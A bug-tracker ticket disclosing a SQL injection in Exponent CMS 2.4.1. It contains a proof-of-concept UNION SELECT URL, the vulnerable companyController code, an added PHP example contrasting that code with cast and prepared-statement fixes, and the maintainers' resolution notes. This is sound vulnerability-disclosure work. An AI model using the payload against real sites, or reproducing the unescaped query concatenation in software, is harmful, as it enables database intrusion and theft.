SQL Injection Vulnerability in Exponent CMS 2.4.1
Reported by Croxy | February 26th, 2017 @ 03:56 PM | in 2.4.2 (closed)
http://xx.com/source_selector.php?controller=company&action=show&id=1' UNION ALL SELECT 1,user(),1,1,1,1,1,1,1,1%23
In framework/modules/companyController.php
function show()
{
    // global $db, $user, $router;
    global $user, $router;
    //eDebug($this->params,true);
    expHistory::set('viewable', $this->params);
    $count_sql_start = 'SELECT COUNT(DISTINCT p.id) as c FROM '.DB_TABLE_PREFIX.'_product p ';
    $sql_start = 'SELECT DISTINCT p.* FROM '.DB_TABLE_PREFIX.'_product p ';
    //$sql = 'JOIN '.DB_TABLE_PREFIX.'_product_storeCategories sc ON p.id = sc.product_id ';
    $sql = 'WHERE ';
    if (!$user->isAdmin()) $sql .= '(p.active_type=0 OR p.active_type=1) AND ' ;
    //$sql .= 'sc.storecategories_id IN (';
    //$sql .= 'SELECT id FROM '.DB_TABLE_PREFIX.'_storeCategories WHERE rgt BETWEEN '.$this->category->lft.' AND '.$this->category->rgt.')';
    // request parameter concatenated into the query unquoted and unescaped
    $sql .= 'p.companies_id=' . $this->params['id'];
    $sql .= ' AND p.parent_id = 0';
    $count_sql = $count_sql_start . $sql;
    $sql = $sql_start . $sql;
    //eDebug($sql);
    $order = 'id'; //$this->config['orderby'];
    $dir = 'DESC'; //$this->config['orderby_dir'];
I can control $this->params['id'], and I can use this parameter for SQL injection.
In line 118:
assign_to_template(array(
    'record'=>new company($this->params['id']),
    'page'=>$page,
    'defaultSort'=>$defaultSort
));
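As an added example (not Exponent CMS code and not part of the report), the query construction above beside two hardened forms, run against an in-memory SQLite database through PDO; the table layout, sample rows and the pdo_sqlite availability are assumptions.

```php
<?php
// Added example, not Exponent CMS code: contrasts the query construction from
// companyController::show() with two hardened forms. Runs against an in-memory
// SQLite database via PDO (assumption: the pdo_sqlite extension is available).
const DB_TABLE_PREFIX = 'exp';

// Vulnerable pattern (as in the ticket): the request value is spliced into the SQL text.
function vulnerableSql(string $id): string
{
    $sql = 'SELECT DISTINCT p.* FROM ' . DB_TABLE_PREFIX . '_product p WHERE ';
    $sql .= 'p.companies_id=' . $id;          // attacker-controlled, unquoted, unescaped
    $sql .= ' AND p.parent_id = 0';
    return $sql;
}

// Hardened form 1: the id is an integer by contract, so coerce it before it touches SQL.
function castSql(string $id): string
{
    $sql = 'SELECT DISTINCT p.* FROM ' . DB_TABLE_PREFIX . '_product p WHERE ';
    $sql .= 'p.companies_id=' . (int) $id;    // "1' UNION ..." becomes 1; the tail is dropped
    $sql .= ' AND p.parent_id = 0';
    return $sql;
}

// Hardened form 2: validate, then bind. The value never becomes part of the statement text.
function companyProducts(PDO $db, string $id): array
{
    if (!ctype_digit($id)) {
        throw new InvalidArgumentException('id must be a non-negative integer');
    }
    $stmt = $db->prepare('SELECT DISTINCT p.* FROM ' . DB_TABLE_PREFIX
        . '_product p WHERE p.companies_id = :id AND p.parent_id = 0');
    $stmt->execute([':id' => (int) $id]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ' . DB_TABLE_PREFIX . '_product (id INTEGER, companies_id INTEGER, parent_id INTEGER, title TEXT)');
$db->exec('INSERT INTO ' . DB_TABLE_PREFIX . "_product VALUES (1, 1, 0, 'widget'), (2, 2, 0, 'gadget')");

// Constructed input shaped like the ticket's proof of concept (URL-decoded).
$tainted = "1' UNION ALL SELECT 1,user(),1,1,1,1,1,1,1,1#";
echo vulnerableSql($tainted), PHP_EOL;   // the UNION survives into the query text
echo castSql($tainted), PHP_EOL;         // ... WHERE p.companies_id=1 AND p.parent_id = 0
print_r(companyProducts($db, '1'));      // one row: widget
try {
    companyProducts($db, $tainted);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), PHP_EOL;
}
```

The cast variant is the smallest change to the existing string-building code; the prepared-statement variant is the one to prefer wherever the query is rewritten, since it also covers the `new company($this->params['id'])` call at line 118 if that constructor is given the same validated integer.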
Comments and changes to this ticket
expNinja February 27th, 2017 @ 01:41 PM
- State changed from new to resolved
- Assigned user changed from expNinja to dleffler
- Milestone set to 2.4.2
(from [85c1b9f3e0650e3b970dfd35584c419c06910594]) security fix exploits using source_selector.php reported by Belladona-c0re and croxy [#1407 state:resolved milestone:2.4.2 responsible:dleffler] https://github.com/exponentcms/exponent-cms/commit/85c1b9f3e0650e3b...
Croxy March 2nd, 2017 @ 03:30 AM
Hi,
I have successfully applied for a CVE ID (CVE-2017-6364).
Thank you
Bug Tracker for Exponent CMS